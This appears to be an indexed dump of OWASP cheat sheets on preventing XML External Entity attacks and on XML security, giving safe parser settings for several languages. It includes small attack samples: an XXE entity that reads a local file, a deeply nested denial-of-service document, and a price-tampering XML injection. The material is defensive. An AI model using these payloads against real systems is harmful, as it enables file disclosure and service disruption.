XMLReader reader = XMLReaderFactory.createXMLReader();\nreader.setFeature(\"http://apache.org/xml/features/disallow-doctype-decl\", true);\n// This may not be strictly required as DTDs shouldn't be allowed at all, per previous line.\nreader.setFeature(\"http://apache.org/xml/features/nonvalidating/load-external-dtd\", false);\nreader.setFeature(\"http://xml.org/sax/features/external-general-entities\", false);\nreader.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false);\n
"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#saxreader","title":"SAXReader","text":"

To protect a Java org.dom4j.io.SAXReader from XXE, do this:

saxReader.setFeature(\"http://apache.org/xml/features/disallow-doctype-decl\", true);\nsaxReader.setFeature(\"http://xml.org/sax/features/external-general-entities\", false);\nsaxReader.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false);\n

Based on testing, if you are missing one of these, you can still be vulnerable to an XXE attack.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#saxbuilder","title":"SAXBuilder","text":"

To protect a Java org.jdom2.input.SAXBuilder from XXE, disallow DTDs (doctypes) entirely:

SAXBuilder builder = new SAXBuilder();\nbuilder.setFeature(\"http://apache.org/xml/features/disallow-doctype-decl\",true);\nDocument doc = builder.build(new File(fileName));\n

Alternatively, if DTDs can't be completely disabled, disable external entities and entity expansion:

SAXBuilder builder = new SAXBuilder();\nbuilder.setFeature(\"http://xml.org/sax/features/external-general-entities\", false);\nbuilder.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false);\nbuilder.setExpandEntities(false);\nDocument doc = builder.build(new File(fileName));\n
"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#no-op-entityresolver","title":"No-op EntityResolver","text":"

For APIs that take an EntityResolver, you can neutralize an XML parser's ability to resolve entities by supplying a no-op implementation:

public final class NoOpEntityResolver implements EntityResolver {\npublic InputSource resolveEntity(String publicId, String systemId) {\nreturn new InputSource(new StringReader(\"\"));\n}\n}\n\n// ...\n\nxmlReader.setEntityResolver(new NoOpEntityResolver());\ndocumentBuilder.setEntityResolver(new NoOpEntityResolver());\n

or more simply:

EntityResolver noop = (publicId, systemId) -> new InputSource(new StringReader(\"\"));\nxmlReader.setEntityResolver(noop);\ndocumentBuilder.setEntityResolver(noop);\n
"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#jaxb-unmarshaller","title":"JAXB Unmarshaller","text":"

Since a javax.xml.bind.Unmarshaller parses XML and does not support any flags for disabling XXE, it's imperative to parse the untrusted XML through a configurable secure parser first, generate a source object as a result, and pass the source object to the Unmarshaller. For example:

SAXParserFactory spf = SAXParserFactory.newInstance();\n\n//Option 1: This is the PRIMARY defense against XXE\nspf.setFeature(\"http://apache.org/xml/features/disallow-doctype-decl\", true);\nspf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);\nspf.setXIncludeAware(false);\n\n//Option 2: If disabling doctypes is not possible\nspf.setFeature(\"http://xml.org/sax/features/external-general-entities\", false);\nspf.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false);\nspf.setFeature(\"http://apache.org/xml/features/nonvalidating/load-external-dtd\", false);\nspf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);\nspf.setXIncludeAware(false);\n\n//Do unmarshall operation\nSource xmlSource = new SAXSource(spf.newSAXParser().getXMLReader(),\nnew InputSource(new StringReader(xml)));\nJAXBContext jc = JAXBContext.newInstance(Object.class);\nUnmarshaller um = jc.createUnmarshaller();\num.unmarshal(xmlSource);\n
"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#xpathexpression","title":"XPathExpression","text":"

A javax.xml.xpath.XPathExpression can not be configured securely by itself, so the untrusted data must be parsed through another securable XML parser first.

For example:

DocumentBuilderFactory df = DocumentBuilderFactory.newInstance();\ndf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\");\ndf.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\");\nDocumentBuilder builder = df.newDocumentBuilder();\nString result = new XPathExpression().evaluate( builder.parse(\nnew ByteArrayInputStream(xml.getBytes())) );\n
"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#javabeansxmldecoder","title":"java.beans.XMLDecoder","text":"

The readObject() method in this class is fundamentally unsafe.

Not only is the XML it parses subject to XXE, but the method can be used to construct any Java object, and execute arbitrary code as described here.

And there is no way to make use of this class safe except to trust or properly validate the input being passed into it.

As such, we'd strongly recommend completely avoiding the use of this class and replacing it with a safe or properly configured XML parser as described elsewhere in this cheat sheet.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#other-xml-parsers","title":"Other XML Parsers","text":"

There are many third-party libraries that parse XML either directly or through their use of other libraries. Please test and verify their XML parser is secure against XXE by default. If the parser is not secure by default, look for flags supported by the parser to disable all possible external resource inclusions like the examples given above. If there's no control exposed to the outside, make sure the untrusted content is passed through a secure parser first and then passed to insecure third-party parser similar to how the Unmarshaller is secured.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#spring-framework-mvcoxm-xxe-vulnerabilities","title":"Spring Framework MVC/OXM XXE Vulnerabilities","text":"

For example, some XXE vulnerabilities were found in Spring OXM and Spring MVC. The following versions of the Spring Framework are vulnerable to XXE:

There were other issues as well that were fixed later, so to fully address these issues, Spring recommends you upgrade to Spring Framework 3.2.8+ or 4.0.2+.

For Spring OXM, this is referring to the use of org.springframework.oxm.jaxb.Jaxb2Marshaller. Note that the CVE for Spring OXM specifically indicates that 2 XML parsing situations are up to the developer to get right, and 2 are the responsibility of Spring and were fixed to address this CVE.

Here's what they say:

Two situations developers must handle:

The issue Spring fixed:

For SAXSource and StreamSource instances, Spring processed external entities by default thereby creating this vulnerability.

Here's an example of using a StreamSource that was vulnerable, but is now safe, if you are using a fixed version of Spring OXM or Spring MVC:

import org.springframework.oxm.Jaxb2Marshaller;\nimport org.springframework.oxm.jaxb.Jaxb2Marshaller;\n\nJaxb2Marshaller marshaller = new Jaxb2Marshaller();\n// Must cast return Object to whatever type you are unmarshalling\nmarshaller.unmarshal(new StreamSource(new StringReader(some_string_containing_XML));\n

So, per the Spring OXM CVE writeup, the above is now safe. But if you were to use a DOMSource or StAXSource instead, it would be up to you to configure those sources to be safe from XXE.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#castor","title":"Castor","text":"

Castor is a data binding framework for Java. It allows conversion between Java objects, XML, and relational tables. The XML features in Castor prior to version 1.3.3 are vulnerable to XXE, and should be upgraded to the latest version. For additional information, check the official XML configuration file

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#net","title":".NET","text":"

The following, up to date information for XXE injection in .NET is directly from this web application of unit tests by Dean Fleming. This web application covers all currently supported .NET XML parsers, and has test cases for each demonstrating when they are safe from XXE injection and when they are not, but tests are only with injection from file and not direct DTD (used by DoS attacks).

For DoS attacks using a direct DTD (such as the Billion laughs attack), a separate testing application from Josh Grossman at Bounce Security has been created to verify that .NET >=4.5.2 is safe from these attacks.

Previously, this information was based on some older articles which may not be 100% accurate including:

The following table lists all supported .NET XML parsers and their default safety levels. Note that in .NET Framework \u22654.5.2 in all cases if a DoS attempt is performed, an exception is thrown due to the expanded XML being too many characters.

Table explanation:

Attack Type .NET Framework Version XDocument (Linq to XML) XmlDictionaryReader XmlDocument XmlNodeReader XmlReader XmlTextReader XPathNavigator XslCompiledTransform External entity Attacks <4.5.2 \u2705 \u2705 \u274c \u2705 \u2705 \u274c \u274c \u2705 \u22654.5.2 \u2705 \u2705 \u2705 \u2705 \u2705 \u2705 \u2705 \u2705 Billion Laughs <4.5.2 \u2753 \u2705 \u274c \u2705 \u2705 \u274c \u274c \u2705 \u22654.5.2 \u2705 \u2705* \u2705 \u2705* \u2705* \u2705 \u2705 \u2705

* For .NET Framework Versions \u22654.5.2, these libraries won't even process the in-line DTD by default. Even if you change the default to allow processing a DTD, if a DoS attempt is performed an exception will still be thrown as documented above.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#linq-to-xml","title":"LINQ to XML","text":"

Both the XElement and XDocument objects in the System.Xml.Linq library are safe from XXE injection from external file and DoS attack by default. XElement parses only the elements within the XML file, so DTDs are ignored altogether. XDocument has XmlResolver disabled by default so it's safe from SSRF. Whilst DTDs are enabled by default, from Framework versions \u22654.5.2, it is not vulnerable to DoS as noted but it may be vulnerable in earlier Framework versions. For more information, see Microsoft's guidance on how to prevent XXE and XML Denial of Service in .NET

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#xmldictionaryreader","title":"XmlDictionaryReader","text":"

System.Xml.XmlDictionaryReader is safe by default, as when it attempts to parse the DTD, the compiler throws an exception saying that \"CData elements not valid at top level of an XML document\". It becomes unsafe if constructed with a different unsafe XML parser.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#xmldocument","title":"XmlDocument","text":"

Prior to .NET Framework version 4.5.2, System.Xml.XmlDocument is unsafe by default. The XmlDocument object has an XmlResolver object within it that needs to be set to null in versions prior to 4.5.2. In versions 4.5.2 and up, this XmlResolver is set to null by default.

The following example shows how it is made safe:

 static void LoadXML()\n{\nstring xxePayload = \"<!DOCTYPE doc [<!ENTITY win SYSTEM 'file:///C:/Users/testdata2.txt'>]>\"\n+ \"<doc>&win;</doc>\";\nstring xml = \"<?xml version='1.0' ?>\" + xxePayload;\n\nXmlDocument xmlDoc = new XmlDocument();\n// Setting this to NULL disables DTDs - Its NOT null by default.\nxmlDoc.XmlResolver = null;\nxmlDoc.LoadXml(xml);\nConsole.WriteLine(xmlDoc.InnerText);\nConsole.ReadLine();\n}\n

For .NET Framework version \u22654.5.2, this is safe by default.

XmlDocument can become unsafe if you create your own nonnull XmlResolver with default or unsafe settings. If you need to enable DTD processing, instructions on how to do so safely are described in detail in the referenced MSDN article.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#xmlnodereader","title":"XmlNodeReader","text":"

System.Xml.XmlNodeReader objects are safe by default and will ignore DTDs even when constructed with an unsafe parser or wrapped in another unsafe parser.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#xmlreader_1","title":"XmlReader","text":"

System.Xml.XmlReader objects are safe by default.

They are set by default to have their ProhibitDtd property set to false in .NET Framework versions 4.0 and earlier, or their DtdProcessing property set to Prohibit in .NET versions 4.0 and later.

Additionally, in .NET versions 4.5.2 and later, the XmlReaderSettings belonging to the XmlReader has its XmlResolver set to null by default, which provides an additional layer of safety.

Therefore, XmlReader objects will only become unsafe in version 4.5.2 and up if both the DtdProcessing property is set to Parse and the XmlReaderSetting's XmlResolver is set to a nonnull XmlResolver with default or unsafe settings. If you need to enable DTD processing, instructions on how to do so safely are described in detail in the referenced MSDN article.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#xmltextreader","title":"XmlTextReader","text":"

System.Xml.XmlTextReader is unsafe by default in .NET Framework versions prior to 4.5.2. Here is how to make it safe in various .NET versions:

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#prior-to-net-40","title":"Prior to .NET 4.0","text":"

In .NET Framework versions prior to 4.0, DTD parsing behavior for XmlReader objects like XmlTextReader are controlled by the Boolean ProhibitDtd property found in the System.Xml.XmlReaderSettings and System.Xml.XmlTextReader classes.

Set these values to true to disable inline DTDs completely.

XmlTextReader reader = new XmlTextReader(stream);\n// NEEDED because the default is FALSE!!\nreader.ProhibitDtd = true;  
"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#net-40-net-452","title":".NET 4.0 - .NET 4.5.2","text":"

In .NET Framework version 4.0, DTD parsing behavior has been changed. The ProhibitDtd property has been deprecated in favor of the new DtdProcessing property.

However, they didn't change the default settings so XmlTextReader is still vulnerable to XXE by default.

Setting DtdProcessing to Prohibit causes the runtime to throw an exception if a <!DOCTYPE> element is present in the XML.

To set this value yourself, it looks like this:

XmlTextReader reader = new XmlTextReader(stream);\n// NEEDED because the default is Parse!!\nreader.DtdProcessing = DtdProcessing.Prohibit;  

Alternatively, you can set the DtdProcessing property to Ignore, which will not throw an exception on encountering a <!DOCTYPE> element but will simply skip over it and not process it. Finally, you can set DtdProcessing to Parse if you do want to allow and process inline DTDs.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#net-452-and-later","title":".NET 4.5.2 and later","text":"

In .NET Framework versions 4.5.2 and up, XmlTextReader's internal XmlResolver is set to null by default, making the XmlTextReader ignore DTDs by default. The XmlTextReader can become unsafe if you create your own nonnull XmlResolver with default or unsafe settings.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#xpathnavigator","title":"XPathNavigator","text":"

System.Xml.XPath.XPathNavigator is unsafe by default in .NET Framework versions prior to 4.5.2.

This is due to the fact that it implements IXPathNavigable objects like XmlDocument, which are also unsafe by default in versions prior to 4.5.2.

You can make XPathNavigator safe by giving it a safe parser like XmlReader (which is safe by default) in the XPathDocument's constructor.

Here is an example:

XmlReader reader = XmlReader.Create(\"example.xml\");\nXPathDocument doc = new XPathDocument(reader);\nXPathNavigator nav = doc.CreateNavigator();\nstring xml = nav.InnerXml.ToString();\n

For .NET Framework version \u22654.5.2, XPathNavigator is safe by default.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#xslcompiledtransform","title":"XslCompiledTransform","text":"

System.Xml.Xsl.XslCompiledTransform (an XML transformer) is safe by default as long as the parser it's given is safe.

It is safe by default because the default parser of the Transform() methods is an XmlReader, which is safe by default (per above).

The source code for this method is here.

Some of the Transform() methods accept an XmlReader or IXPathNavigable (e.g., XmlDocument) as an input, and if you pass in an unsafe XML Parser then the Transform will also be unsafe.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#ios","title":"iOS","text":""},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#libxml2_1","title":"libxml2","text":"

iOS includes the C/C++ libxml2 library described above, so that guidance applies if you are using libxml2 directly.

However, the version of libxml2 provided up through iOS6 is prior to version 2.9 of libxml2 (which protects against XXE by default).

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#nsxmldocument","title":"NSXMLDocument","text":"

iOS also provides an NSXMLDocument type, which is built on top of libxml2.

However, NSXMLDocument provides some additional protections against XXE that aren't available in libxml2 directly.

Per the 'NSXMLDocument External Entity Restriction API' section of this page:

However, to completely disable XXE in an NSXMLDocument in any version of iOS you simply specify NSXMLNodeLoadExternalEntitiesNever when creating the NSXMLDocument.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#php","title":"PHP","text":"

When using the default XML parser (based on libxml2), PHP 8.0 and newer prevent XXE by default.

For PHP versions prior to 8.0, per the PHP documentation, the following should be set when using the default PHP XML parser in order to prevent XXE:

libxml_set_external_entity_loader(null);\n

A description of how to abuse this in PHP is presented in a good SensePost article describing a cool PHP based XXE vulnerability that was fixed in Facebook.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#python","title":"Python","text":"

The Python 3 official documentation contains a section on xml vulnerabilities. As of the 1st January 2020 Python 2 is no longer supported, however the Python website still contains some legacy documentation.

The following table gives an overview of various modules in Python 3 used for XML parsing and whether or not they are vulnerable.

Attack Type sax etree minidom pulldom xmlrpc Billion Laughs Vulnerable Vulnerable Vulnerable Vulnerable Vulnerable Quadratic Blowup Vulnerable Vulnerable Vulnerable Vulnerable Vulnerable External Entity Expansion Safe Safe Safe Safe Safe DTD Retrieval Safe Safe Safe Safe Safe Decompression Bomb Safe Safe Safe Safe Vulnerable

To protect your application from the applicable attacks, two packages exist to help you sanitize your input and protect your application against DDoS and remote attacks.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#semgrep-rules","title":"Semgrep Rules","text":"

Semgrep is a command-line tool for offline static analysis. Use pre-built or custom rules to enforce code and security standards in your codebase.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#java_1","title":"Java","text":"

Below are the rules for different XML parsers in Java

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#digester","title":"Digester","text":"

Identifying XXE vulnerability in the org.apache.commons.digester3.Digester library Rule can be played here https://semgrep.dev/s/salecharohit:xxe-Digester

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#documentbuilderfactory","title":"DocumentBuilderFactory","text":"

Identifying XXE vulnerability in the javax.xml.parsers.DocumentBuilderFactory library Rule can be played here https://semgrep.dev/s/salecharohit:xxe-dbf

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#saxbuilder_1","title":"SAXBuilder","text":"

Identifying XXE vulnerability in the org.jdom2.input.SAXBuilder library Rule can be played here https://semgrep.dev/s/salecharohit:xxe-saxbuilder

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#saxparserfactory","title":"SAXParserFactory","text":"

Identifying XXE vulnerability in the javax.xml.parsers.SAXParserFactory library Rule can be played here https://semgrep.dev/s/salecharohit:xxe-SAXParserFactory

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#saxreader_1","title":"SAXReader","text":"

Identifying XXE vulnerability in the org.dom4j.io.SAXReader library Rule can be played here https://semgrep.dev/s/salecharohit:xxe-SAXReader

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#xmlinputfactory","title":"XMLInputFactory","text":"

Identifying XXE vulnerability in the javax.xml.stream.XMLInputFactory library Rule can be played here https://semgrep.dev/s/salecharohit:xxe-XMLInputFactory

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#xmlreader_2","title":"XMLReader","text":"

Identifying XXE vulnerability in the org.xml.sax.XMLReader library Rule can be played here https://semgrep.dev/s/salecharohit:xxe-XMLReader

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html","title":"XML Security Cheat Sheet","text":""},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#malformed-xml-documents","title":"Malformed XML Documents","text":"

The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.

The recommendation to avoid these vulnerabilities are to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#more-time-required","title":"More Time Required","text":"

A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS).

To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#applications-processing-malformed-data","title":"Applications Processing Malformed Data","text":"

Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document's noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.

The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#malformed-document-to-malformed-document","title":"Malformed Document to Malformed Document","text":"

According to the XML specification, the string -- (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:

<element>\n<!-- one\n  <!-- another comment\n comment -->\n</element>\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#well-formed-document-to-well-formed-document-normalized","title":"Well-Formed Document to Well-Formed Document Normalized","text":"

Certain parsers may consider normalizing the contents of your CDATA sections. This means that they will update the special characters contained in the CDATA section to contain the safe versions of these characters even though is not required:

<element>\n<![CDATA[<script>a=1;</script>]]>\n</element>\n

Normalization of a CDATA section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:

<element>\n&lt;script&gt;a=1;&lt;/script&gt;\n</element>\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#coercive-parsing","title":"Coercive Parsing","text":"

A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up -and eventually deplete- the machine's resources and cause a denial of service on the target. Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this:

<A1>\n<A2>\n<A3>\n...\n    <A30000>\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#violation-of-xml-specification-rules","title":"Violation of XML Specification Rules","text":"

Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#invalid-xml-documents","title":"Invalid XML Documents","text":"

Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.

The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#document-without-schema","title":"Document without Schema","text":"

Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an id value related to an item and a certain price. The user may only introduce a certain id value using the web interface:

<buy>\n<id>123</id>\n<price>10</price>\n</buy>\n

If there is no control on the document's structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:

<buy>\n<id>123</id><price>0</price><id></id>\n<price>10</price>\n</buy>\n

Notice again how the value 123 is supplied as an id, but now the document includes additional opening and closing tags. The attacker closed the id element and sets a bogus price element to the value 0. The final step to keep the structure well-formed is to add one empty id element. After this, the application adds the closing tag for id and set the price to 10. If the application processes only the first values provided for the ID and the value without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#unrestrictive-schema","title":"Unrestrictive Schema","text":"

Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person's age is validated against an inline DTD schema:

<!DOCTYPE person [\n <!ELEMENT person (name, age)>\n<!ELEMENT name (#PCDATA)>\n<!ELEMENT age (#PCDATA)>\n]>\n<person>\n<name>John Doe</name>\n<age>11111..(1.000.000digits)..11111</age>\n</person>\n

The previous document contains an inline DTD with a root element named person. This element contains two elements in a specific order: name and then age. The element name is then defined to contain PCDATA as well as the element age. After this definition begins the well-formed and valid XML document. The element name contains an irrelevant value but the age element contains one million digits. Since there are no restrictions on the maximum size for the age element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain amount of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign). If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element name or a valid range for the element age), this type of schema increases the risk of affecting the integrity and availability of resources.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#improper-data-validation","title":"Improper Data Validation","text":"

When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application's functionality with unexpected values.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#string-data-types","title":"String Data Types","text":"

Provided you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters. To exemplify this scenario, when using XML encryption some values must be encoded using base64 . This is the schema definition of how these values should look:

<element name=\"CipherData\" type=\"xenc:CipherDataType\"/>\n<complexType name=\"CipherDataType\">\n<choice>\n<element name=\"CipherValue\" type=\"base64Binary\"/>\n<element ref=\"xenc:CipherReference\"/>\n</choice>\n</complexType>\n

The previous schema defines the element CipherValue as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and will consider it valid. The first portion of this data is properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the CipherData element). Restrictions are partially set for the element, which means that the information is probably tested using an application instead of the proposed sample schema.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#numeric-data-types","title":"Numeric Data Types","text":"

Defining the correct data type for numbers can be more complex since there are more options than there are for strings.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#negative-and-positive-restrictions","title":"Negative and Positive Restrictions","text":"

XML Schema numeric data types can include different ranges of numbers. They could include:

The following sample document defines an id for a product, a price, and a quantity value that is under the control of an attacker:

<buy>\n<id>1</id>\n<price>10</price>\n<quantity>1</quantity>\n</buy>\n

To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:

<xs:schema xmlns:xs=\"http://www.w3.org/2001/XMLSchema\">\n<xs:element name=\"buy\">\n<xs:complexType>\n<xs:sequence>\n<xs:element name=\"id\" type=\"xs:integer\"/>\n<xs:element name=\"price\" type=\"xs:decimal\"/>\n<xs:element name=\"quantity\" type=\"xs:integer\"/>\n</xs:sequence>\n</xs:complexType>\n</xs:element>\n</xs:schema>\n

Limiting that quantity to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing price*quantity. However, since this data type may allow negative values, it might allow a negative result on the user's account if an attacker provides a negative number. What you probably want to see in here to avoid that logical vulnerability is positiveInteger instead of integer.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#divide-by-zero","title":"Divide by Zero","text":"

Whenever using user controlled values as denominators in a division, developers should avoid allowing the number zero. In cases where the value zero is used for division in XSLT, the error FOAR0001 will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that specifically avoid using the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type positiveInteger for the element.

<xs:element name=\"denominator\">\n<xs:simpleType>\n<xs:restriction base=\"xs:positiveInteger\"/>\n</xs:simpleType>\n</xs:element>\n

The element denominator is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see any other type of restriction being used, you may trigger an error if the denominator is zero.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#special-values-infinity-and-not-a-number-nan","title":"Special Values: Infinity and Not a Number (NaN)","text":"

The data types float and double contain real numbers and some special values: -Infinity or -INF, NaN, and +Infinity or INF. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that they are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies. Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values Infinity and NaN are not required and only real numbers are expected, the data type decimal is recommended:

<xs:schema xmlns:xs=\"http://www.w3.org/2001/XMLSchema\">\n<xs:element name=\"buy\">\n<xs:complexType>\n<xs:sequence>\n<xs:element name=\"id\" type=\"xs:integer\"/>\n<xs:element name=\"price\" type=\"xs:decimal\"/>\n<xs:element name=\"quantity\" type=\"xs:positiveInteger\"/>\n</xs:sequence>\n</xs:complexType>\n</xs:element>\n</xs:schema>\n

The price value will not trigger any errors when set at Infinity or NaN, because these values will not be valid. An attacker can exploit this issue if those values are allowed.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#general-data-restrictions","title":"General Data Restrictions","text":"

After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#prefixed-values","title":"Prefixed Values","text":"

Certain types of values should only be restricted to specific sets: traffic lights will have only three types of colors, only 12 months are available, and so on. It is possible that the schema has these restrictions in place for each element or attribute. This is the most perfect allow-list scenario for an application: only specific values will be accepted. Such a constraint is called enumeration in XML schema. The following example restricts the contents of the element month to 12 possible values:

